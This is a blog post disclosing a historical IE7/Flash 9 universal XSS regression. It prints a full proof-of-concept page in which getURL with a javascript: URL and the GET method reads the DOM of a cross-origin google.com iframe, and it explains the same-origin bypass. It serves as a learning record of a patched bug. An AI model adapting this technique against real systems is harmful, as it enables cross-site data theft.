UXSS: IE7 + Flash 9 getURL GET Method Allows Cross-Origin Script Injection

I had previously reported a UXSS using Flash’s getURL with the POST method. When Flash 9 shipped, I checked whether the GET method variant — which had been fixed in Flash 6 through 8 — was still blocked. It wasn’t. Flash 9 running in IE7 would execute a javascript: URL supplied to getURL inside an iframe named as the target, even if that iframe was loaded from a completely different origin. This was a regression: an old hole that came back.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>xDomain using getURL from Flash with GET Method</title></head>
<body>
<center>
<h1>xDom_IE7_Flash9GetURL<font color="red">GET</font>Method</h1>
</center>
<font face="Verdana" size="2">
<hr />
<u>Very Important</u>: I already reported a similar bug [09/11/2006:WOOBR bug #957315] using the POST method. But this "new" GET method is very important, and here's why: <br /><br />
Flash 4.x and 5.x ---> Vulnerable to the GET Method. I think (not sure) this one was public.<br /><br />
Flash 6.x, 7.x and 8.x ---> Fixed the GET Method, but we (MS) found a variation using the POST Method. I don't know if we finally reported it to Adobe.<br /><br />
Flash 9.x ---> (With IE7 ONLY) Vulnerable -again- to the GET Method. So guys, here's an old open hole that came back from death. I think we should fix it before any outsider finds out. It's an easy to find bug.<br /><br />
<hr />
<center>

xDomain using getURL from Flash <U>with GET Method</U>. Works on <b>IE7 with Flash 9.x</b>. We have an IFRAME called "ifr" and a .swf file that does this:<BR><BR>
Usage: getURL (URL, TARGET, METHOD)<BR>
<B>getURL("javascript:alert(ifr.document.body.innerHTML), "ifr", "GET");</B><BR><BR>
So the javascript URL works inside an IFRAME that is on a different domain. :(<BR><BR>
</font>

<iframe name="ifr" width="500" height="300" src="http://www.google.com/"></iframe>
<br />
<object ID="daFlash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="200" height="200">
<param name="movie" value="xomaingetclick.swf"/>
</object>

</center>
</body>
</html>

Flash’s getURL(url, target, method) function was designed to navigate a named frame to a URL. When the method is "GET" and the URL is a javascript: URI, Flash 9 in IE7 would evaluate that JavaScript in the security context of the named target frame — in this case "ifr", which is loaded from google.com. This bypasses the same-origin policy completely: the attacker’s SWF, hosted on one domain, can read and manipulate the DOM of an iframe on any other domain. Earlier Flash versions had patched the GET variant but Flash 9 reintroduced it, making this a textbook security regression.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [UXSS Using Flash getURL POST Method] :: [DoS: createPopup Chain with Windows Media Player innerHTML] >